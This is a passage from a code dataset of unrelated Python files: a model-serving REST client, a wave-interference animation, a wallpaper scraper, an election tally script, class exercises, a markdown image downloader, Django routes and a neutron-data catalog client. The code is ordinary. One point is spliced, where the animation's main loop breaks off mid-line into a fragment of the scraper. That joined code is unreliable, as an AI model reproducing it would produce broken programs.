\"auto\".\n ``n_gpu=None`` means cpu only, ``n_gpu=auto`` lets the system automatically determine the best number of GPUs to use.\n **kwargs:\n Any other parameters been specified.\n\n Returns\n -------\n str\n The unique model_uid for the launched model.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models\"\n\n if model_uid is None:\n model_uid = self._gen_model_uid()\n\n payload = {\n \"model_uid\": model_uid,\n \"model_name\": model_name,\n \"model_type\": model_type,\n \"model_size_in_billions\": model_size_in_billions,\n \"model_format\": model_format,\n \"quantization\": quantization,\n \"replica\": replica,\n \"n_gpu\": n_gpu,\n }\n\n for key, value in kwargs.items():\n payload[str(key)] = value\n\n response = requests.post(url, json=payload)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to launch model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data[\"model_uid\"]\n\n def terminate_model(self, model_uid: str):\n \"\"\"\n Terminate the specific model running on the server.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model we want.\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n\n response = requests.delete(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to terminate model, detail: {response.json()['detail']}\"\n )\n\n def _get_supervisor_internal_address(self):\n url = f\"{self.base_url}/v1/address\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(f\"Failed to get supervisor internal address\")\n response_data = response.json()\n return response_data\n\n def get_model(self, model_uid: str) -> RESTfulModelHandle:\n \"\"\"\n Launch the model based on the parameters on the server via RESTful APIs.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model.\n\n Returns\n -------\n ModelHandle\n The corresponding Model Handler based on the Model specified in the uid:\n \"RESTfulChatglmCppChatModelHandle\" -> provide handle to ChatGLM Model\n \"RESTfulGenerateModelHandle\" -> provide handle to basic generate Model. e.g. Baichuan.\n \"RESTfulChatModelHandle\" -> provide handle to chat Model. e.g. Baichuan-chat.\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to get the model description, detail: {response.json()['detail']}\"\n )\n desc = response.json()\n\n if desc[\"model_type\"] == \"LLM\":\n if desc[\"model_format\"] == \"ggmlv3\" and \"chatglm\" in desc[\"model_name\"]:\n return RESTfulChatglmCppChatModelHandle(model_uid, self.base_url)\n elif \"chat\" in desc[\"model_ability\"]:\n return RESTfulChatModelHandle(model_uid, self.base_url)\n elif \"generate\" in desc[\"model_ability\"]:\n return RESTfulGenerateModelHandle(model_uid, self.base_url)\n else:\n raise ValueError(f\"Unrecognized model ability: {desc['model_ability']}\")\n elif desc[\"model_type\"] == \"embedding\":\n return RESTfulEmbeddingModelHandle(model_uid, self.base_url)\n elif desc[\"model_type\"] == \"image\":\n return RESTfulImageModelHandle(model_uid, self.base_url)\n else:\n raise ValueError(f\"Unknown model type:{desc['model_type']}\")\n\n def describe_model(self, model_uid: str):\n \"\"\"\n Get model information via RESTful APIs.\n\n Parameters\n ----------\n model_uid: str\n The unique id that identify the model.\n\n Returns\n -------\n dict\n A dictionary containing the following keys:\n - \"model_type\": str\n the type of the model determined by its function, e.g. \"LLM\" (Large Language Model)\n - \"model_name\": str\n the name of the specific LLM model family\n - \"model_lang\": List[str]\n the languages supported by the LLM model\n - \"model_ability\": List[str]\n the ability or capabilities of the LLM model\n - \"model_description\": str\n a detailed description of the LLM model\n - \"model_format\": str\n the format specification of the LLM model\n - \"model_size_in_billions\": int\n the size of the LLM model in billions\n - \"quantization\": str\n the quantization applied to the model\n - \"revision\": str\n the revision number of the LLM model specification\n - \"context_length\": int\n the maximum text length the LLM model can accommodate (include all input & output)\n\n Raises\n ------\n RuntimeError\n Report failure to get the wanted model with given model_uid. Provide details of failure through error message.\n\n \"\"\"\n\n url = f\"{self.base_url}/v1/models/{model_uid}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to get the model description, detail: {response.json()['detail']}\"\n )\n return response.json()\n\n def register_model(self, model_type: str, model: str, persist: bool):\n \"\"\"\n Register a custom model.\n\n Parameters\n ----------\n model_type: str\n The type of model.\n model: str\n The model definition. (refer to: https://inference.readthedocs.io/en/latest/models/custom.html)\n persist: bool\n\n\n Raises\n ------\n RuntimeError\n Report failure to register the custom model. Provide details of failure through error message.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}\"\n request_body = {\"model\": model, \"persist\": persist}\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to register model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def unregister_model(self, model_type: str, model_name: str):\n \"\"\"\n Unregister a custom model.\n\n Parameters\n ----------\n model_type: str\n The type of model.\n model_name: str\n The name of the model\n\n Raises\n ------\n RuntimeError\n Report failure to unregister the custom model. Provide details of failure through error message.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}/{model_name}\"\n response = requests.delete(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to register model, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def list_model_registrations(self, model_type: str) -> List[Dict[str, Any]]:\n \"\"\"\n List models registered on the server.\n\n Parameters\n ----------\n model_type: str\n The type of the model.\n\n Returns\n -------\n List[Dict[str, Any]]\n The collection of registered models on the server.\n\n Raises\n ------\n RuntimeError\n Report failure to list model registration. Provide details of failure through error message.\n\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model registration, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n def get_model_registration(\n self, model_type: str, model_name: str\n ) -> Dict[str, Any]:\n \"\"\"\n Get the model with the model type and model name registered on the server.\n\n Parameters\n ----------\n model_type: str\n The type of the model.\n\n model_name: str\n The name of the model.\n Returns\n -------\n List[Dict[str, Any]]\n The collection of registered models on the server.\n \"\"\"\n url = f\"{self.base_url}/v1/model_registrations/{model_type}/{model_name}\"\n response = requests.get(url)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to list model registration, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n","repo_name":"ReggieMiller/inference","sub_path":"xinference/client/restful/restful_client.py","file_name":"restful_client.py","file_ext":"py","file_size_in_byte":22432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"74411134628","text":"################\n#Interference #\n#Michael Malahe#\n#2006 #\n################\n\n#Instructions:\n#The leftmost and rightmost buttons cycle through the wave types coming from either direction.\n#The start/pause button is pretty self-explanatory.\n#The stop button stops the animation entirely, so you can start at the beginning again with changes.\n#When the auto/manual button is set to manual, the start/pause button becomes a frame-by-frame clicker.\n#The last parameter, globstep, should be increased on slow machines and reduced on faster ones.\n\n#Modules\nfrom __future__ import division\nfrom visual import *\nfrom visual.graph import *\nfrom visual.controls import *\nfrom math import *\n\n#Parameters\nobsloc = 0\ntlen = 20\nspeed = 1.5\nframerate = 35\ntmax = 10\nglobstep = 0.1\n\n#Constants\nt = 0\ndt = 1/framerate\n\n#Wave class\nclass wave:\n def __init__(self,function,xmin,xmax,step,pos,render):\n self.pos = pos\n self.function = function\n if render == 1:\n self.curve = []\n self.xmin = xmin\n self.xmax = xmax\n self.step = step\n for x in arange(xmin,xmax,step):\n exec(\"y=\"+function+\"(x)\")\n self.curve.append((x,y))\n lol = [(a[0]+pos[0],a[1]+pos[1]) for a in self.curve]\n lol.insert(0,(-tlen,0))\n lol.append((tlen,0))\n self.render = curve(pos=lol, radius=0.03)\n else:\n pass\n def interfere(self,wave):\n self.curve = []\n for x in arange(-tlen,tlen,self.step):\n pos1 = x-self.pos[0]\n pos2 = x-wave.pos[0]\n exec(\"y=\"+self.function+\"(pos1)\"+\"+\"+wave.function+\"(pos2)\")\n self.curve.append((x,y))\n self.render.pos = self.curve\n\n#Additional wave types\ndef triangle(x):\n if x<=-1 or x>=1:\n y = 0\n else:\n y = 1-abs(x)\n return y\n\ndef lopsided(x):\n if x<=-1 or x>=0.5:\n y = 0\n elif x >= 0:\n y = 2*(0.5-x)\n elif x<0:\n y = 1+x\n return y\n\ndef square(x):\n if x<=-1 or x>=1:\n y = 0\n else:\n y = 1\n return y\n\ndef sqsin(x):\n if x<-pi or x>pi:\n y = 0\n else:\n y = (sin(x))**2\n return y\n\ndef sqtri(x):\n if x<-2:\n y = 0\n if x<0 and x>=-2:\n y = -1\n if x>=0 and x<2:\n y = -abs(-x+1)+1\n if x>=2:\n y = 0\n return y\n\ndef sine(x):\n if x<-pi or x>pi:\n y = 0\n else:\n y = sin(x)\n return y\n\n#3d Scene\nscene = display(title='Pulse',\n width=1024, height=600, x=0, y=0,\n center=(obsloc,0,0), background=(0,0,0))\nscene.autoscale = 0\nscene.userspin = 0\nscene.range = (10,7,1)\nobs = curve(pos=[(obsloc,1.5),(obsloc,-1.5)], color = color.yellow, radius=0.03)\n\n#Control functions\ndef togglego():\n if ss.go == 1:\n ss.go = 0\n ss.text = \"Start\"\n elif ss.go == 0:\n ss.go = 1\n ss.text = \"Pause\"\n\ndef wfcycle(wf):\n if wf.text == \"1/2 sin\":\n wf.text = \"triangle\"\n elif wf.text == \"triangle\":\n wf.text = \"square\"\n elif wf.text == \"square\":\n wf.text = \"lopsided\"\n elif wf.text == \"lopsided\":\n wf.text = \"sine\"\n elif wf.text == \"sine\":\n wf.text = \"sqsin\"\n elif wf.text == \"sqsin\":\n wf.text = \"sqtri\"\n elif wf.text == \"sqtri\":\n wf.text = \"1/2 sin\"\n\ndef stop():\n stp.stp = 1\n\ndef autotoggle():\n if auto.text == \"Auto\":\n auto.text = \"Manual\"\n elif auto.text == \"Manual\":\n auto.text = \"Auto\"\n\n#Control scene\nc = controls(title='Controls',\n x=0, y=600, width=1024, height=150, range=50)\nss = button(pos=(-5,0), width=10, height=10,\n text='Start', action=lambda:togglego())\nwf1 = button(pos=(-15,0), width=10, height=10,\n text='sine', action=lambda:wfcycle(wf1))\nwf2 = button(pos=(25,0), width=10, height=10,\n text='sine', action=lambda:wfcycle(wf2))\nstp = button(pos=(5,0), width=10, height=10,\n text='Stop', action=lambda:stop())\nauto = button(pos=(15,0), width=10, height=10,\n text='Auto', action=lambda:autotoggle())\n\n#Main Loop:\nwhile 1:\n ss.go = 0\n stp.stp = 0\n ss.text = \"Start\"\n c.interact()\n if ss.go == 1:\n t = 0\n try:\n wave1.render.visible = 0\n wave2.render.visible = 0\n except:\n pass\n #New wave\n if wf1.text == \"1/2 sin\":\n wave1 = wave(\"sine\",0,pi,globstep,(-15,0),1)\n else:\n wave1 = wave(wf1.text,-pi,pi,globstep,(-7,0),1)\n if wf2.text == \"1/2 sin\":\n wave2 = wave(\"sine\",0,pi,globstep,(15,0),0)\n else:\n wave2 = wave(wf2.text,-pi,pi,globstep,(7,0),0)\n #Motion Loop\n while t.*?)\" target=\"_blank\"', re.S)\n\nurls = []\nphoto_urls = []\nphoto_names = []\n# 信号量,控制协程数,防止爬的过快\nsem = asyncio.Semaphore(10)\nnew_photo_count = 0\nold_photo_count = 0\n\n\ndef confirm_param():\n global originUrl\n if len(originUrl) > 30:\n originUrl += '&page='\n else:\n originUrl += '?page='\n\n\nasync def get_urls(url, page_num, session):\n print(\"开始获取第\" + str(page_num) + \"页的图片链接\")\n while True:\n async with sem:\n await asyncio.sleep(1.5)\n print('发出请求' + str(page_num) + 'url:' + url)\n try:\n async with await session.request('GET', url, headers=headers) as resp: # 提出请求\n print(resp.status)\n if resp.status == 200:\n page_content = await resp.text()\n break\n except:\n print('url:' + url + \"请求被拒绝\")\n # print(page_content)\n # 迭代器\n the_iter = com.finditer(page_content)\n for it in the_iter:\n # print(it.group(\"url\"))\n urls.append(it.group(\"url\"))\n\n\ndef get_photo_url_by_name(url_array):\n for url in url_array:\n photo_name = url.split('/')[-1]\n pre_name = photo_name[:2]\n url = f\"https://w.wallhaven.cc/full/{pre_name}/wallhaven-{photo_name}.jpg\"\n photo_urls.append(url)\n print(url)\n photo_name += '.jpg'\n photo_names.append(photo_name)\n\n\nasync def save_a_photo(photo_url, index, session):\n # print('原url'+photo_url)\n while True:\n async with sem:\n jpg_photo_name = str(photo_names[index][:-3]) + 'jpg'\n jpg_path = path + jpg_photo_name\n png_photo_name = str(photo_names[index][:-3]) + 'png'\n png_path = path + png_photo_name\n if not os.path.exists(jpg_path) and not os.path.exists(png_path):\n try:\n async with await session.request('GET', photo_url, headers=headers) as resp:\n if resp.status == 429:\n print(\"429请求过快\")\n continue\n print(resp.status)\n if resp.status == 404:\n photo_names[index] = str(photo_names[index][:-3]) + 'png'\n photo_url = photo_url[:-3] + 'png'\n print('修正后的url为:' + photo_url)\n try:\n async with await session.request('GET', photo_url, headers=headers) as resp2:\n photo_content = await resp2.read()\n if resp2.status == 200:\n with open(path + photo_names[index], mode='wb')as f:\n f.write(photo_content)\n print(str(index) + \":\" + str(photo_names[index]) + '保存成功')\n\n break\n except:\n print('图片保存失败:' + photo_url)\n else:\n photo_names[index] = str(photo_names[index][:-3]) + 'jpg'\n photo_content = await resp.read()\n if resp.status == 200:\n with open(path + photo_names[index], mode='wb')as f:\n f.write(photo_content)\n print(str(index) + \":\" + str(photo_names[index]) + '保存成功')\n break\n except:\n print('图片保存失败:' + photo_url)\n else:\n print(\"图片\" + photo_names[index][:-4] + \"已存在\")\n break\n\n\nasync def main_save_photo(photo_url_array):\n tasks = []\n index = 0\n async with aiohttp.ClientSession() as session:\n for url in photo_url_array:\n tasks.append(asyncio.create_task(save_a_photo(url, index, session)))\n index += 1\n await asyncio.wait(tasks)\n\n\nasync def main_get_urls(page_num):\n tasks = [] # 把所有任务放到一个列表中\n async with aiohttp.ClientSession() as session: # 获取session\n for index in range(1, page_num + 1):\n tasks.append(asyncio.create_task(get_urls(originUrl + str(index), index, session)))\n print(len(tasks))\n await asyncio.wait(tasks) # 激活协程\n\n\nif __name__ == '__main__':\n confirm_param()\n print(max_page)\n loop = asyncio.get_event_loop() # 获取事件循环\n loop.run_until_complete(main_get_urls(max_page)) # 激活协程\n print(urls)\n print(len(urls))\n get_photo_url_by_name(urls)\n loop = asyncio.get_event_loop() # 获取事件循环\n loop.run_until_complete(main_save_photo(photo_urls)) # 激活协程\n","repo_name":"KallenBlue/wallheaven_downloader","sub_path":"wallheaven_downloader.py","file_name":"wallheaven_downloader.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"72897512551","text":"from datetime import timedelta\nfrom typing import Dict\n\nfrom electionguard.ballot import (\n BallotBoxState,\n SubmittedBallot,\n from_ciphertext_ballot,\n)\nfrom electionguard.data_store import DataStore\n\nfrom electionguard.encrypt import encrypt_ballot\nfrom electionguard.group import ElementModQ, ONE_MOD_Q\nfrom electionguard.tally import CiphertextTally, tally_ballots, tally_ballot\n\n\nfrom electionguard_tools.strategies.election import (\n elections_and_ballots,\n ELECTIONS_AND_BALLOTS_TUPLE_TYPE,\n)\nfrom electionguard_tools.factories.election_factory import ElectionFactory\nfrom electionguard_tools.helpers.tally_accumulate import accumulate_plaintext_ballots\n\nfrom electionguard.elgamal import ElGamalKeyPair\nfrom electionguard.group import (\n ElementModQ,\n TWO_MOD_P,\n ONE_MOD_Q,\n mult_p,\n g_pow_p,\n)\nfrom electionguard.manifest import InternalManifest\nfrom electionguard.election import (\n CiphertextElectionContext,\n make_ciphertext_election_context,\n)\nimport electionguard_tools.factories.ballot_factory as BallotFactory\nimport os\n\ndef _decrypt_with_secret(\n tally: CiphertextTally, secret_key: ElementModQ\n) -> Dict[str, int]:\n \"\"\"\n Demonstrates how to decrypt a tally with a known secret key\n \"\"\"\n plaintext_selections: Dict[str, int] = {}\n for _, contest in tally.contests.items():\n for object_id, selection in contest.selections.items():\n plaintext_tally = selection.ciphertext.decrypt(secret_key)\n plaintext_selections[object_id] = plaintext_tally\n\n return plaintext_selections\n\nexport_data_dir = os.path.join(os.path.dirname(os.getcwd()), \"tally_outputs\")\n\nelection_factory = ElectionFactory()\nballot_factory = BallotFactory.BallotFactory()\nkeypair = ElGamalKeyPair(TWO_MOD_P, g_pow_p(TWO_MOD_P))\n\n# set the datastore to store all the ballots\nstore = DataStore()\n\nencypted_file_dir = os.path.join(os.path.dirname(os.getcwd()), 'encrypted_data')\ngenerated_file_dir = os.path.join(os.path.dirname(os.getcwd()), 'generated_data')\nballotNum = \"127\"\nencypted_file_dir_with_ballotNum = os.path.join(encypted_file_dir, ballotNum)\ngenerated_data_dir_with_ballotNum = os.path.join(generated_file_dir, ballotNum)\nfor ballot_filename in os.listdir(encypted_file_dir_with_ballotNum):\n subject = ballot_factory.get_ciphertext_ballot_from_file(encypted_file_dir_with_ballotNum, ballot_filename)\n manifest = election_factory.get_simple_manifest_from_file_self_defined_directory(generated_data_dir_with_ballotNum, \"manifest.json\")\n internal_manifest = InternalManifest(manifest)\n context = make_ciphertext_election_context(\n number_of_guardians=1,\n quorum=1,\n elgamal_public_key=keypair.public_key,\n commitment_hash=ElementModQ(2),\n manifest_hash=manifest.crypto_hash(),\n )\n # add to the ballot store\n store.set(\n subject.object_id,\n from_ciphertext_ballot(subject, BallotBoxState.CAST),\n )\n\n# act\nresult = tally_ballots(store, internal_manifest, context)\nprint(\"ciphertext ballots length is \", result.cast())\nprint (\"tally ballot result is \", result)\ndecrypted_subject_to_export = ballot_factory.export_ballot_to_file(\n result, export_data_dir, \"tally_output\"\n)\n# self.assertIsNotNone(result)\n\n# Assert\ndecrypted_tallies = _decrypt_with_secret(result, keypair.secret_key)\nprint(\"decrypted_tally\")\nprint(decrypted_tallies)\n# self.assertEqual(plaintext_tallies, decrypted_tallies)\n\n\n\n# keypair = ElGamalKeyPair(TWO_MOD_P, g_pow_p(TWO_MOD_P))\n# secret_key = TWO_MOD_P\n# election = election_factory.get_simple_manifest_from_file()\n# internal_manifest, context = election_factory.get_fake_ciphertext_election(\n# election, keypair.public_key\n# )\n# ballots = ballot_factory.get_simple_ballots_from_file()\n#\n# # Tally the plaintext ballots for comparison later\n# plaintext_tallies = accumulate_plaintext_ballots(ballots)\n# print(\"plaintext tallies \", plaintext_tallies)\n#\n# # encrypt each ballot\n# store = DataStore()\n# encryption_seed = ElectionFactory.get_encryption_device().get_hash()\n# for ballot in ballots:\n# encrypted_ballot = encrypt_ballot(\n# ballot, internal_manifest, context, encryption_seed\n# )\n# encryption_seed = encrypted_ballot.code\n# # print(\"encrypted ballot is \", encrypted_ballot)\n# # add to the ballot store\n# store.set(\n# encrypted_ballot.object_id,\n# from_ciphertext_ballot(encrypted_ballot, BallotBoxState.CAST),\n# )\n#\n# print(\"finish encrypting all the ballots!!!!!!\")\n# export_data_dir = os.path.join(os.path.dirname(os.getcwd()), \"tally_outputs\")\n#\n# # act\n# result = tally_ballots(store, internal_manifest, context)\n# # print(\"result is \", result)\n# decrypted_subject_to_export = ballot_factory.export_ballot_to_file(\n# result, export_data_dir, \"sample_tally_result2\"\n# )\n#\n# # Assert\n# decrypted_tallies = _decrypt_with_secret(result, secret_key)\n# print(\"decrypted_tally\")\n# print(decrypted_tallies)","repo_name":"Xin128/ElectionGuard-COMP413","sub_path":"electionguard-python/tests/testTally.py","file_name":"testTally.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"7638967146","text":"# 5\r\nclass employee:\r\n n=int(input(\"Enter how many employees:\"))\r\n def __init__(self):\r\n for self.i in range(self.n):\r\n self.name=input(\"Enter your name:\")\r\n self.designation=input(\"Enter your designation:\")\r\n self.salary=int(input(\"Enter your salary:\"))\r\n print(\"The employee name is {} his designation is {} and his salary is {}.\".format(self.name,\r\n self.designation,\r\n self.salary))\r\n\r\n\r\ne=employee()\r\n\r\n# 6\r\n\r\nclass person:\r\n def __init__(self):\r\n self.name=input(\"Enter your name:\")\r\n self.year,self.month,self.day=map(int,input(\"Enter year month number and day with spaces:\").split())\r\n self._year,self._month,self._day=map(int,input(\"Enter year month number and day of today with spaces:\").split())\r\nclass dob(person):\r\n def vote(self):\r\n self.t_year=self._year-self.year\r\n if self.t_year>=18:\r\n print(\"Eligible\")\r\n else:\r\n print(\"Not eligible.\")\r\ndob=dob()\r\ndob.vote()\r\n# 7\r\nimport math\r\nclass circle:\r\n pi=math.pi\r\n def area(self):\r\n self.radius=int(input(\"Enter the radius:\"))\r\n self.area=self.pi*self.radius**2\r\n print(\"Area:\",self.area)\r\n def circumference(self):\r\n self.circumference=2*self.pi*self.radius\r\n print(\"circumference:\",self.circumference)\r\nc=circle()\r\nc.area()\r\nc.circumference()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"hardhik2002/iare-python","sub_path":"module-5-5 to 9.py","file_name":"module-5-5 to 9.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11894267393","text":"import os\nimport re\nimport time\nfrom urllib.parse import urlparse\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\ndef extract_image_urls_from_markdown_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n content = f.read()\n # 使用正则表达式提取图片URL\n image_urls = re.findall(r'!\\[.*?\\]\\((.*?)\\)', content)\n return image_urls\n\ndef save_images_from_markdown_directory(directory):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'\n }\n chrome_options = Options()\n # 设置Chrome浏览器有界面模式,注释掉--headless\n # chrome_options.add_argument('--headless')\n # 指定Chrome浏览器驱动程序路径,请根据实际情况进行修改\n chrome_driver_path = 'E:\\\\Program Files (x86)\\\\chromedriver_win32\\\\chromedriver.exe' # 将路径替换为实际的驱动程序路径\n\n for root, dirs, files in os.walk(directory):\n for file in files:\n if file.endswith('.md'):\n file_path = os.path.join(root, file)\n image_urls = extract_image_urls_from_markdown_file(file_path)\n image_dir = os.path.join(root, 'images')\n os.makedirs(image_dir, exist_ok=True) # 创建保存图片的目录\n\n # 读取文件内容\n with open(file_path, 'r', encoding='utf-8') as f:\n content = f.read()\n\n # 创建浏览器实例\n driver = webdriver.Chrome(chrome_driver_path, options=chrome_options)\n\n for url in image_urls:\n # 检查URL是否以http://或https://开头\n if url.startswith('http://') or url.startswith('https://'):\n try:\n # 使用Selenium打开网页\n driver.get(url)\n time.sleep(2) # 等待页面加载完成,可根据实际情况调整等待时间\n\n # 获取图片元素\n img_element = driver.find_element_by_tag_name('img')\n\n # 获取图片URL\n image_url = img_element.get_attribute('src')\n\n # 下载图片\n response = requests.get(image_url, headers=headers)\n if response.status_code == 200:\n filename = os.path.basename(urlparse(image_url).path)\n save_path = os.path.join(image_dir, filename)\n with open(save_path, 'wb') as f:\n f.write(response.content)\n print(f'Saved image: {save_path}')\n # 替换Markdown文档中的URL为相对路径\n relative_path = os.path.relpath(save_path, os.path.dirname(file_path))\n content = content.replace(url, relative_path.replace(\"\\\\\", \"/\"))\n print(f'Replaced URL in Markdown: {url} -> {relative_path}')\n time.sleep(5) # 添加1秒的延迟\n else:\n print(f'Error downloading image: {url} - HTTP status code: {response.status_code}')\n except Exception as e:\n print(f'Error downloading image: {url}')\n print(e)\n\n # 关闭浏览器\n driver.quit()\n\n # 将修改后的内容写回文件\n with open(file_path, 'w', encoding='utf-8') as f:\n f.write(content)\n\n# 设置Markdown文档所在的目录\nmarkdown_directory = './docs/七政四餘星盤 天星擇日 占星盤 - Moira/'\n\nsave_images_from_markdown_directory(markdown_directory)\n","repo_name":"xiwangly2/moira","sub_path":"scripts/selenium图片处理.py","file_name":"selenium图片处理.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"675350521","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n # sessions\n path('login/', views.LoginView.as_view(), name='login'),\n path('logout/', views.LogoutView.as_view(), name='logout'),\n\n # register\n path('register/', views.RegisterView.as_view(), name='register'),\n path('register/success/',views.RegisterSuccessView.as_view(), name='register-success'),\n\n]\n","repo_name":"hcosta/django-easyregistration","sub_path":"registration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"3558255795","text":"import logging\nfrom pprint import pformat, pprint\nfrom django.conf import settings\nfrom .rest import RESTInterface\n\n'''\n\nThis file only ommunicates with the oncat.\nThe data is return RAW from ONCat\n\nThe PAI documentation is here:\nhttps://oncat.ornl.gov/doc\n\nFor future see this:\nhttp://requests-oauthlib.readthedocs.io/en/latest/oauth2_workflow.html#legacy-application-flow\n\n'''\nlogger = logging.getLogger(__name__)\n\n\nclass ONCat(RESTInterface):\n '''\n Base class for the ONCat requests\n It shouldn't be instantiated\n '''\n def __init__(self, request):\n super().__init__(\n url_prefix=settings.ONCAT_URL,\n request=request,\n http_method='get',\n )\n\n def experiments(self, facility, instrument):\n '''\n '''\n logger.debug(\"func experiments for %s and %s.\",\n facility, instrument)\n params_json = {\n 'facility': facility,\n 'instrument': instrument,\n 'projection': ['tags', 'name', 'title', 'exts',\n 'size', 'latest', 'users'],\n }\n return self._request(\"/experiments\", params_json)\n\n def runs(self, params_json):\n '''\n\n '''\n # logger.debug(\"func runs:\\n%s\", pformat(params_json))\n result = self._request(\"/datafiles\", params_json=params_json)\n if result is not None and len(result) > 0:\n return result\n else:\n return []\n\n def run(self, facility, instrument, ipts, file_location):\n '''\n '''\n logger.debug(\"func runs for %s %s and %s: %s\",\n facility, instrument, ipts, file_location)\n\n params_json = {\n 'facility': facility,\n 'instrument': instrument,\n 'experiment': ipts,\n }\n return self._request(\"/datafiles{}\".format(file_location),\n params_json=params_json)\n\n\nclass HFIR(ONCat):\n\n # different instruments have different file types (TAS has .dat)\n RUNS_EXTENSIONS = {\n 'DEFAULT': ['.xml'],\n 'CG4C': ['.dat'],\n 'HB1': ['.dat'],\n 'HB1A': ['.dat'],\n 'HB3': ['.dat'],\n }\n\n def __init__(self, request):\n super().__init__(request)\n self.facility = 'HFIR'\n\n def experiments(self, instrument):\n return super().experiments(self.facility, instrument)\n\n def runs(self, instrument, ipts, exp, projection, extensions):\n \n params_json = {\n 'facility': self.facility,\n 'instrument': instrument,\n 'experiment': ipts,\n 'tags': ['spice/{}'.format(exp)],\n 'exts': extensions,\n 'projection': projection,\n }\n return super().runs(params_json)\n\n def run(self, instrument, ipts, file_location):\n return super().run(self.facility, instrument, ipts, file_location)\n\n\nclass SNS(ONCat):\n\n \n\n def __init__(self, request):\n super().__init__(request)\n self.facility = 'SNS'\n\n def experiments(self, instrument):\n '''\n @return:\n [{'id': 'IPTS-18268',\n 'name': 'IPTS-18268',\n 'tags': ['type/raw'],\n 'type': 'experiment'}, ... ]\n '''\n return super().experiments(self.facility, instrument)\n\n def runs(self, instrument, ipts, projection, extensions):\n '''\n\n '''\n params_json = {\n 'facility': self.facility,\n 'instrument': instrument,\n 'experiment': ipts,\n 'exts': extensions,\n 'projection': projection,\n }\n return super().runs(params_json)\n \n def run(self, instrument, ipts, file_location):\n '''\n '''\n return super().run(self.facility, instrument, ipts, file_location)\n\n\nif __name__ == \"__main__\":\n \n from http.client import HTTPConnection\n HTTPConnection.debuglevel = 1\n\n logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests\n logging.getLogger().setLevel(logging.DEBUG)\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True\n\n # ## HFIR\n # oncat = HFIR()\n # res = oncat.experiments(\"CG3\")\n # res = oncat.runs(\"CG3\", ipts='IPTS-19469', exp='exp406')\n # res = oncat.run(\"CG3\", 'IPTS-19469', '/HFIR/CG3/IPTS-19469/exp406/Datafiles/BioSANS_exp406_scan0016_0001.xml')\n \n\n ## SNS\n oncat = SNS()\n # res = oncat.experiments(\"EQSANS\")\n res = oncat.runs(\"EQSANS\", 'IPTS-19298')\n # res = oncat.run(\"EQSANS\", 'IPTS-19298', '/SNS/EQSANS/IPTS-19298/nexus/EQSANS_87594.nxs.h5')\n\n print(\"\\n\"+80*\"*\")\n pprint(res)\n","repo_name":"neutrons/WebReduction","sub_path":"src/server/apps/catalog/oncat/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"241569282","text":"'''\nmamikhai@cisco.com\n20200111\nstarting constants for monitor.py\n'''\nmodel_directory = './model' # delete or rename folder to have a fresh model, or if you change layers, optimizer, etc.\n\nx_periods = 0\n\nfeature_mean = 0.0\nfeature_std = 0.0\nfeature_max = 0.0\n\ntunnel_ifs = ['tunnel-te11200', 'tunnel-te11201', 'tunnel-te13501', 'tunnel-te13502', 'tunnel-te13703', 'tunnel-te13704', 'tunnel-te17801', 'tunnel-te17802', 'tunnel-te12400', 'tunnel-te12401', 'tunnel-te12402', 'tunnel-te12403', 'tunnel-te12404', 'tunnel-te12500', 'tunnel-te12501', 'tunnel-te12502', 'tunnel-te12503', 'tunnel-te12504']\n\n# physical_ifs = 